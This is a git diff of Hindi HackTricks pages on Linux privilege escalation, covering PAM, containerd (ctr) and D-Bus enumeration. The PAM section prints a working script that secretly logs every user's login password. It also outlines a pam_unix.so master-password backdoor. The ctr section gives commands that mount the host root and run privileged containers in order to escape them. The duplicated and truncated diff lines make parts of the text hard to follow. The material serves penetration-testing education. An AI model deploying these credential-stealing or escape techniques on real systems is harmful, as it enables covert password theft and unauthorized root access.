GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, पीआर जमा करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) और **हमें** **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## PAM के साथ लॉगऑन पासवर्ड को स्निफ करें ## PAM के साथ लॉगऑन पासवर्ड को स्निफ करें
आइए एक PAM मॉड्यूल कॉन्फ़िगर करें ताकि हर उपयोगकर्ता जो लॉगिन करता है, उसका पासवर्ड लॉग कर सकें। अगर आपको PAM क्या है इसका पता नहीं है तो देखें: चलिए एक PAM मॉड्यूल कॉन्फ़िगर करें ताकि हर उपयोगकर्ता जो लॉगिन करने के लिए उपयोग करता है, उस पासवर्ड को लॉग कर सकें। अगर आपको PAM क्या है इसका पता नहीं है तो देखें:
{% content-ref url="pam-pluggable-authentication-modules.md" %} {% content-ref url="pam-pluggable-authentication-modules.md" %}
[pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md) [pam-pluggable-authentication-modules.md](pam-pluggable-authentication-modules.md)
@ -25,12 +26,12 @@ HackTricks का समर्थन करने के अन्य तरी
**अधिक विवरण के लिए [मूल पोस्ट](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/) देखें**। यह सिर्फ एक सारांश है: **अधिक विवरण के लिए [मूल पोस्ट](https://embracethered.com/blog/posts/2022/post-exploit-pam-ssh-password-grabbing/) देखें**। यह सिर्फ एक सारांश है:
**तकनीक अवलोकन:** **तकनीक अवलोकन:**
प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) यूनिक्स-आधारित सिस्टमों पर प्रमाणीकरण को प्रबंधित करने में लचीलाई प्रदान करते हैं। वे लॉगिन प्रक्रियाओं को अनुकूलित करके सुरक्षा को बढ़ा सकते हैं लेकिन गलत तरीके से उपयोग किए जाने पर खतरे भी उठा सकते हैं। यह सारांश एक तकनीक को आउटलाइन करता है जिससे PAM का उपयोग करके लॉगिन क्रेडेंशियल्स को कैप्चर किया जा सकता है, साथ ही संशोधन रणनीतियों। प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) यूनिक्स-आधारित सिस्टम पर प्रमाणीकरण को प्रबंधित करने में लचीलाई प्रदान करते हैं। वे लॉगिन प्रक्रियाओं को अनुकूलित करके सुरक्षा को बढ़ा सकते हैं लेकिन गलत तरीके से उपयोग किए जाने पर खतरे भी उठा सकते हैं। यह सारांश एक तकनीक को उजागर करने के लिए PAM का उपयोग करके लॉगिन क्रेडेंशियल को कैप्चर करने की विधि को रूपांतरित करता है, साथ ही संशोधन रणनीतियों को
**क्रेडेंशियल्स को कैप्चर करना:** **क्रेडेंशियल को कैप्चर करना:**
- `toomanysecrets.sh` नामक एक बैश स्क्रिप्ट तैयार किया जाता है ताकि लॉगिन प्रयासों को लॉग किया जा सके, जिसमें तारीख, उपयोगकर्ता नाम (`$PAM_USER`), पासवर्ड (stdin के माध्यम से), और रिमोट होस्ट IP (`$PAM_RHOST`) को `/var/log/toomanysecrets.log` में कैप्चर किया जाता है। - `toomanysecrets.sh` नामक एक बैश स्क्रिप्ट तैयार किया गया है जो लॉगिन प्रयासों को लॉग करने के लिए बनाया गया है, जिसमें तारीख, उपयोगकर्ता नाम (`$PAM_USER`), पासवर्ड (stdin के माध्यम से), और रिमोट होस्ट IP (`$PAM_RHOST`) को `/var/log/toomanysecrets.log` में कैप्चर किया जाता है।
- स्क्रिप्ट को क्रियाशील बनाया जाता है और `pam_exec.so` मॉड्यूल का उपयोग करके PAM कॉन्फ़िगरेशन (`common-auth`) में शामिल किया जाता है, जिसमें स्क्रिप्ट को चुपचाप चलाने और प्रमाणीकरण टोकन को स्क्रिप्ट को उजागर करने के विकल्प शामिल हैं। - स्क्रिप्ट को क्रियाशील बनाया जाता है और `pam_exec.so` मॉड्यूल का उपयोग करके PAM कॉन्फ़िगरेशन (`common-auth`) में शामिल किया जाता है, जिसमें स्क्रिप्ट को चुपचाप चलाने और प्रमाणीकरण टोकन को स्क्रिप्ट को उजागर करने के विकल्प दिए जाते हैं।
- यह दिखाता है कि कैसे एक कंप्रोमाइज़्ड लिनक्स होस्ट को गुप्त रूप से क्रेडेंशियल्स लॉग करने के लिए उपयोग किया जा सकता है। - यह दृष्टिकोण दिखाता है कि कैसे एक कंप्रोमाइज़्ड लिनक्स होस्ट को गुप्त रूप से क्रेडेंशियल को लॉग करने के लिए उपयोग किया जा सकता है।
```bash ```bash
#!/bin/sh #!/bin/sh
echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
@ -44,16 +45,20 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh
**अधिक विवरण के लिए [मूल पोस्ट](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9) देखें**। यह केवल एक सारांश है: **अधिक विवरण के लिए [मूल पोस्ट](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9) देखें**। यह केवल एक सारांश है:
प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) एक सिस्टम है जो लिनक्स के तहत उपयोगकर्ता प्रमाणीकरण के लिए उपयोग किया जाता है। यह तीन मुख्य अवधारणाओं पर काम करता है: **उपयोगकर्ता नाम**, **पासवर्ड**, और **सेवा**। प्रत्येक सेवा के लिए कॉन्फ़िगरेशन फ़ाइलें `/etc/pam.d/` निर्देशिका में स्थित हैं, जहां साझा पुस्तकालय प्रमाणीकरण का संचालन करती है। प्लगेबल प्रमाणीकरण मॉड्यूल (PAM) एक सिस्टम है जो लिनक्स के तहत उपयोगकर्ता प्रमाणीकरण के लिए उपयोग किया जाता है। यह तीन मुख्य अवधारणाओं पर काम करता है: **उपयोगकर्ता नाम**, **पासवर्ड**, और **सेवा**। प्रत्येक सेवा के लिए कॉन्फ़िगरेशन फ़ाइलें `/etc/pam.d/` निर्देशिका में स्थित हैं, जहां साझा लाइब्रेरी प्रमाणीकरण का संचालन करती है।
**उद्देश्य**: PAM को संशोधित करें ताकि एक विशिष्ट पासवर्ड के साथ प्रमाणीकरण संभव हो, वास्तविक उपयोगकर्ता पासवर्ड को छोड़कर। यह विशेष रूप से `common-auth` फ़ाइल द्वारा उपयोग किए जाने वाले `pam_unix.so` साझा पुस्तकालय पर ध्यान केंद्रित है, जो पासवर्ड सत्यापन के लिए लगभग सभी सेवाओं द्वारा समाविष्ट किया जाता है। **उद्देश्य**: PAM को संशोधित करें ताकि एक विशिष्ट पासवर्ड के साथ प्रमाणीकरण संभव हो, वास्तविक उपयोगकर्ता पासवर्ड को छोड़कर। यह विशेष रूप से `common-auth` फ़ाइल द्वारा उपयोग की जाने वाली `pam_unix.so` साझा लाइब्रेरी पर ध्यान केंद्रित है, जो पासवर्ड सत्यापन के लिए लगभग सभी सेवाओं द्वारा समाहित किया जाता है।
### `pam_unix.so` को संशोधित करने के लिए चरण: ### `pam_unix.so` को संशोधित करने के लिए चरण:
1. **`common-auth` फ़ाइल में प्रमाणीकरण निर्देशिका का पता लगाएं**: 1. **`common-auth` फ़ाइल में प्रमाणीकरण निर्देशिका का पता लगाएं**:
- उपयोगकर्ता के पासवर्ड की जांच के लिए जिम्मेदार लाइन `pam_unix.so` को बुलाती है। - उपयोगकर्ता के पासवर्ड की जांच के लिए जिम्मेदार लाइन `pam_unix.so` को बुलाती है।
2. **स्रोत को संशोधित करें**: 2. **स्रोत को संशोधित करें**:
- `pam_unix_auth.c` स्रोत फ़ाइल में एक शर्तमय वक्तव्य जोड़ें जो यदि एक पूर्वनिर्धारित पासवर्ड का उपयोग किया जाता है, तो पहुच देता है, अन्यथा, यह सामान्य प्रमाणीकरण प्रक्रिया के साथ आगे बढ़ता है। - `pam_unix_auth.c` स्रोत फ़ाइल में एक शर्तमय वक्तव्य जोड़ें जो यदि एक पूर्वनिर्धारित पासवर्ड का उपयोग किया जाता है, तो पहुच देता है, अन्यथा, यह सामान्य प्रमाणीकरण प्रक्रिया के साथ आगे बढ़ता है।
3. **पुनः कॉम्पाइल और पुनः रखें** संशोधित `pam_unix.so` पुस्तकालय को उचित निर्देशिका में। 3. **पुनः कंपाइल और पुनः रखें** संशोधित `pam_unix.so` लाइब्रेरी को उचित निर्देशिका में।
4. **परीक्षण**: 4. **परीक्षण**:
- पूर्वनिर्धारित पासवर्ड के साथ विभिन्न सेवाओं (लॉगिन, ssh, sudo, su, स्क्रीनसेवर) में पहुँच प्रदान की जाती है, जबकि सामान्य प्रमाणीकरण प्रक्रियाएँ प्रभावित नहीं होती हैं। - पूर्वनिर्धारित पासवर्ड के साथ विभिन्न सेवाओं (लॉगिन, ssh, sudo, su, स्क्रीनसेवर) में पहुंच प्रदान की जाती है, जबकि सामान्य प्रमाणीकरण प्रक्रियाएँ प्रभावित नहीं होती हैं।
{% hint style="info" %}
आप इस प्रक्रिया को [https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor) के साथ स्वचालित कर सकते हैं।
{% endhint %}

View file

@ -1,22 +1,23 @@
# कंटेनरडी (ctr) प्रिविलेज एस्कलेशन # Containerd (ctr) वर्दी उन्नति
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** पर फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स देखें**](https://github.com/sponsors/carlospolop)! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में।
* [**आधिकारिक PEASS & HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें और PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## मूल जानकारी ## मौलिक जानकारी
**कंटेनरड** और `ctr` क्या है इसे जानने के लिए निम्न लिंक पर जाएं: **कंटेनरड** और `ctr` क्या है इसे सीखने के लिए निम्न लिंक पर जाएं:
{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} {% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %}
[2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md) [2375-pentesting-docker.md](../../network-services-pentesting/2375-pentesting-docker.md)
@ -29,26 +30,41 @@ HackTricks का समर्थन करने के अन्य तरी
which ctr which ctr
/usr/bin/ctr /usr/bin/ctr
``` ```
आप छवियों की सूची बना सकते हैं: तुम छवियों की सूची बना सकते हो:
```bash ```bash
ctr image list ctr image list
REF TYPE DIGEST SIZE PLATFORMS LABELS REF TYPE DIGEST SIZE PLATFORMS LABELS
registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 - registry:5000/alpine:latest application/vnd.docker.distribution.manifest.v2+json sha256:0565dfc4f13e1df6a2ba35e8ad549b7cb8ce6bccbc472ba69e3fe9326f186fe2 100.1 MiB linux/amd64 -
registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 - registry:5000/ubuntu:latest application/vnd.docker.distribution.manifest.v2+json sha256:ea80198bccd78360e4a36eb43f386134b837455dc5ad03236d97133f3ed3571a 302.8 MiB linux/amd64 -
``` ```
और फिर **उन छवियों में से एक को चलाएं जिसमें मेज़बान रूट फ़ोल्डर को माउंट करें**: और फिर **उन छवियों में से एक को चलाएं जिसमें मेज़बान रूट फ़ोल्डर को माउंट किया गया है**:
```bash ```bash
ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash ctr run --mount type=bind,src=/,dst=/,options=rbind -t registry:5000/ubuntu:latest ubuntu bash
``` ```
## PE 2 ## PE 2
एक कंटेनर को विशेषाधिकार सहित चलाएं और उससे बाहर निकलें।\ एक कंटेनर को विशेषाधिकार स चलाएं और उससे बाहर निकलें।\
आप इसे विशेषाधिकार सहित एक कंटेनर के रूप में चला सकते हैं: आप इसे विशेषाधिकृत कंटेनर के रूप में चला सकते हैं:
```bash ```bash
ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash ctr run --privileged --net-host -t registry:5000/modified-ubuntu:latest ubuntu bash
``` ```
तो आप इससे बाहर निकलने के लिए कुछ तकनीकों का उपयोग कर सकते हैं जो निम्नलिखित पृष्ठ में उल्लेखित किए गए हैं **विशेषाधिकारित क्षमताओं का दुरुपयोग करना**: तो आप इससे बाहर निकलने के लिए कुछ तकनीकों का उपयोग कर सकते हैं जो निम्नलिखित पृष्ठ में उल्लेखित हैं **विशेषाधिकारित क्षमताओं का दुरुपयोग करके**:
{% content-ref url="docker-security/" %} {% content-ref url="docker-security/" %}
[docker-security](docker-security/) [docker-security](docker-security/)
{% endcontent-ref %} {% endcontent-ref %}
{% hint style="success" %}
AWS हैकिंग सीखें और अभ्यास करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और अभ्यास करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>हैकट्रिक्स का समर्थन करें</summary>
* [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 पर **फॉलो** करें [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स** [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github रेपो में PR जमा करके।
</details>
{% endhint %}

View file

@ -1,35 +1,50 @@
# D-Bus Enumeration & Command Injection Privilege Escalation # D-Bus एनुमरेशन और कमांड इंजेक्शन प्रिविलेज एस्केलेशन
{% hint style="success" %}
AWS हैकिंग सीखें और प्रैक्टिस करें:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण AWS रेड टीम एक्सपर्ट (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP हैकिंग सीखें और प्रैक्टिस करें: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks प्रशिक्षण GCP रेड टीम एक्सपर्ट (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details> <details>
<summary><strong>जानें AWS हैकिंग को शून्य से हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a> <strong>के साथ!</strong></summary> <summary>हैकट्रिक्स का समर्थन करें</summary>
HackTricks का समर्थन करने के अन्य तरीके: * [**सब्सक्रिप्शन प्लान**](https://github.com/sponsors/carlospolop) की जाँच करें!
* **शामिल हों** 💬 [**डिस्कॉर्ड ग्रुप**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम ग्रुप**](https://t.me/peass) और **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** को** **फॉलो** करें।
* यदि आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं** या **HackTricks को PDF में डाउनलोड करना चाहते हैं** तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें! * **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**HackTricks**](https://github.com/carlospolop/hacktricks) **और** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **github रेपो में।**
* [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन [**The PEASS Family**](https://opensea.io/collection/the-peass-family) खोजें
* **शामिल हों** 💬 [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या हमें **ट्विटर** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)\*\* पर फॉलो\*\* करें।
* **हैकिंग ट्रिक्स साझा करें** द्वारा **PRs सबमिट** करके [**HackTricks**](https://github.com/carlospolop/hacktricks) और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में।
</details> </details>
{% endhint %}
## **GUI एनुमरेशन** ## **GUI एनुमरेशन**
D-Bus को Ubuntu डेस्कटॉप वातावरणों में अंतर-प्रक्रिया संचार (IPC) माध्यम के रूप में उपयोग किया जाता है। Ubuntu पर, कई संदेश बसों का समकालिक कार्यान्वयन देखा जाता है: सिस्टम बस, जो मुख्य रूप से **विशेषाधिकारी सेवाओं द्वारा सिस्टम भर में महत्वपूर्ण सेवाएं उजागर करने के लिए** उपयोग किया जाता है, और प्रत्येक लॉग-इन उपयोगकर्ता के लिए एक सत्र बस, जो केवल उस विशेष उपयोगकर्ता के लिए महत्वपूर्ण सेवाएं उजागर करता है। यहाँ मुख्य रूप से सिस्टम बस पर ध्यान केंद्रित है क्योंकि इसका संबंध उच्च विशेषाधिकारों (जैसे कि रूट) पर चल रही सेवाओं से है जैसे कि हमारा उद्देश्य प्रिविलेज उन्नत करना है। यह ध्यान दिया जाता है कि D-Bus की संरचना एक 'राउटर' प्रति सत्र बस का उपयोग करती है, जो ग्राहक संदेशों को सही सेवाओं के द्वारा पुनर्निर्देशित करने के लिए जिम्मेदार है जो ग्राहकों द्वारा उन सेवाओं के साथ संवाद करना चाहते हैं उनके द्वारा निर्दिष्ट पते के आधार पर D-Bus को यूबंटू डेस्कटॉप वातावरण में इंटर-प्रोसेस संचार (IPC) मीडिएटर के रूप में उपयोग किया जाता है। यूबंटू पर, कई संदेश बसों का समकालिक ऑपरेशन देखा जाता है: सिस्टम बस, जो मुख्य रूप से **विशेषाधिकारी सेवाओं द्वारा सिस्टम के लिए महत्वपूर्ण सेवाएं उजागर करने के लिए** उपयोग किया जाता है, और प्रत्येक लॉग-इन उपयोगकर्ता के लिए एक सत्र बस, जो केवल उस विशेष उपयोगकर्ता के लिए महत्वपूर्ण सेवाएं उजागर करता है। यहाँ मुख्य रूप से सिस्टम बस पर ध्यान केंद्रित है क्योंकि इसका संबंध उच्च विशेषाधिकारों (जैसे कि रूट) पर चल रही सेवाओं से है जैसे कि हमारा उद्देश्य विशेषाधिकारों को उच्च करना है। यह ध्यान दिया जाता है कि D-Bus की वास्तुकला एक 'राउटर' प्रति सत्र बस का उपयोग करती है, जो ग्राहक संदेशों को उचित सेवाओं के द्वारा पुनर्निर्देशित करने के लिए जिम्मेदार है जो ग्राहकों द्वारा उन सेवाओं के साथ संवाद करना चाहते हैं, उनके द्वारा निर्दिष्ट पते पर आधारित
D-Bus पर सेवाएं **ऑब्जेक्ट्स** और **इंटरफेसेस** द्वारा परिभाषित की जाती हैं। ऑब्ज D-Bus पर सेवाएं **ऑब्जेक्ट्स** और **इंटरफेसेस** द्वारा परिभाषित होती हैं। ऑब्जेक्ट्स को मानक OOP भाषाओं में क्लास इंस्टेंस के रूप में तुलना की जा सकती है, प्रत्येक इस्टेंस को एक **ऑब्जेक्ट पथ** द्वारा अद्वितीय रूप से पहचाना जाता हैयह पथ, एक फाइल सिस्टम पथ की तरह, प्रत्येक सेवा द्वारा उजागर किए गए प्रत्येक ऑब्जेक्ट को अद्वितीय रूप से पहचानता है। अनुसंधान के उद्देश्य के लिए एक मुख्य इंटरफेस **org.freedesktop.DBus.Introspectable** इंटरफेस है, जिसमें एक एकल मेथड, इंट्रोस्पेक्ट है। यह मेथड ऑब्जेक्ट के समर्थित मेथडों, सिग्नल्स, और गुणों का एक XML प्रतिनिधित्व वापस करता है, जिसमें यहाँ मुख्य रूप से मेथड पर ध्यान केंद्रित है जबकि गुणों और सिग्नल्स को छोड़ दिया गया है।
D-Bus इंटरफेस के साथ संचार के लिए, दो उपकरणों का उपयोग किया गया: एक CLI उपकरण जिसका नाम है **gdbus** जो D-Bus द्वारा उजागर किए गए मेथड्स को स्क्रिप्ट में आसानता से आमंत्रित करने के लिए है, और [**D-Feet**](https://wiki.gnome.org/Apps/DFeet), एक Python आधारित GUI उपकरण जो प्रत्येक बस पर उपलब्ध सेवाओं को एनुमरेट करने के लिए डिज़ाइन किया गया है और प्रत्येक सेवा में शामिल ऑब्जेक्ट्स को प्रदर्शित करने के लिए।
```bash ```bash
sudo apt-get install d-feet sudo apt-get install d-feet
``` ```
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png) ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-21.png)
![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png) ![https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png](https://unit42.paloaltonetworks.com/wp-content/uploads/2019/07/word-image-22.png)
पहली छवि में D-Bus सिस्टम बस के साथ पंजीकृत सेवाएं दिखाई गई हैं, **org.debin.apt** को विशेष रूप से चुनकर सिस्टम बस बटन को चुनने के बाद। D-Feet इस सेवा के लिए ऑब्जेक्ट्स के लिए क्वेरी करता है, चुने गए ऑब्ज
पहली छवि में D-Bus सिस्टम बस के साथ पंजीकृत सेवाएं दिखाई गई हैं, **org.debin.apt** को विशेष रूप से चुनकर सिस्टम बस बटन को चुनने के बाद। D-Feet इस सेवा के लिए ऑब्जेक्ट क्वेरी करता है, चुने गए ऑब्जेक्ट्स के लिए इंटरफेस, मेथड्स, गुण, और सिग्नल्स प्रदर्शित करता है, जो दूसरी छवि में दिखाई देता है। प्रत्येक मेथड का सिग्नेचर भी विस्तार से दिखाया गया है।
एक महत्वपूर्ण विशेषता यह है कि सेवा के **प्रोसेस आईडी (पीआईडी)** और **कमांड लाइन** का प्रदर्शन होता है, जो उच्च विशेषाधिकारों के साथ सेवा चलती है या नहीं की पुष्टि के लिए उपयोगी है, जो अनुसंधान के महत्व के लिए महत्वपूर्ण है।
**D-Feet भी मेथड आवाहन की अनुमति देता है**: उपयोगकर्ता पायथन व्यक्तियों को पैरामीटर के रूप में इनपुट कर सकते हैं, जिन्हें D-Feet सेवा को पास करने से पहले D-Bus प्रकार में रूपांतरित करता है।
हालांकि, ध्यान दें कि **कुछ मेथड्स को आवाहन करने से पहले प्रमाणीकरण की आवश्यकता** होती है। हम इन मेथड्स को नजरअंदाज करेंगे, क्योंकि हमारा लक्ष्य पहले ही क्रेडेंशियल के बिना हमारी विशेषाधिकारों को उन्नत करना है।
यह भी ध्यान दें कि कुछ सेवाएं किसी अन्य D-Bus सेवा को क्वेरी करती हैं जिसका नाम org.freedeskto.PolicyKit1 है कि क्या एक उपयोगकर्ता को कुछ कार्रवाई करने की अनुमति होनी चाहिए या नहीं।
## **Cmd line गणना**
### सेवा ऑब्जेक्ट्स की सूची
खुली हुई D-Bus इंटरफेस की सूची बनाना संभव है:
```bash ```bash
busctl list #List D-Bus interfaces busctl list #List D-Bus interfaces
@ -53,13 +68,13 @@ org.freedesktop.PolicyKit1 - - - (act
org.freedesktop.hostname1 - - - (activatable) - - org.freedesktop.hostname1 - - - (activatable) - -
org.freedesktop.locale1 - - - (activatable) - - org.freedesktop.locale1 - - - (activatable) - -
``` ```
#### कनेक्शन #### कनेक्शन
[विकिपीडिया से:](https://en.wikipedia.org/wiki/D-Bus) जब कोई प्रक्रिया एक बस के साथ एक कनेक्शन सेट करती है, तो बस कनेक्शन को एक विशेष बस नाम जो _अद्वितीय कनेक्शन नाम_ कहलाता है निर्धारित करता है। इस प्रकार के बस नाम अपरिवर्तनीय होते हैं—यह गारंटी है कि जब तक कनेक्शन मौजूद है, तब तक ये नहीं बदलेंगे—और, और भी महत्वपूर्ण है, इन्हें बस के जीवनकाल में पुनः उपयोग नहीं किया जा सकता। इसका मतलब है कि उस बस के लिए कोई भी अन्य कनेक्शन कभी भी ऐसा अद्वितीय कनेक्शन नाम नहीं होगा, भले ही वही प्रक्रिया उस बस के साथ कनेक्शन बंद कर देती है और एक नया बनाती है। अद्वितीय कनेक्शन नाम आसानी से पहचाने जा सकते हैं क्योंकि वे—अन्यथा निषिद्ध—अक्षर कोलन के साथ शुरू होते हैं। [विकिपीडिया से:](https://en.wikipedia.org/wiki/D-Bus) जब कोई प्रक्रिया एक बस के साथ एक कनेक्शन सेट करती है, तो बस कनेक्शन को एक विशेष बस नाम जो _अद्वितीय कनेक्शन नाम_ कहलाता है निर्धारित करता है। इस प्रकार के बस नाम अपरिवर्तनीय होते हैं—यह गारंटी है कि जब तक कनेक्शन मौजूद है तब तक वे बदलेंगे नहीं—और, और भी महत्वपूर्ण है, इन्हें बस के जीवनकाल के दौरान पुनः उपयोग नहीं किया जा सकता। इसका मतलब है कि उस बस के लिए कोई भी अन्य कनेक्शन कभी भी ऐसा अद्वितीय कनेक्शन नाम नहीं होगा, भले ही वही प्रक्रिया उस बस के साथ कनेक्शन बंद कर देती है और एक नया बनाती है। अद्वितीय कनेक्शन नाम आसानी से पहचाने जा सकते हैं क्योंकि वे—अन्यथा निषिद्ध—अक्षर के साथ शुरू होते हैं।
### सेवा ऑब्ज ### सेवा ऑब्जेक्ट जानकारी
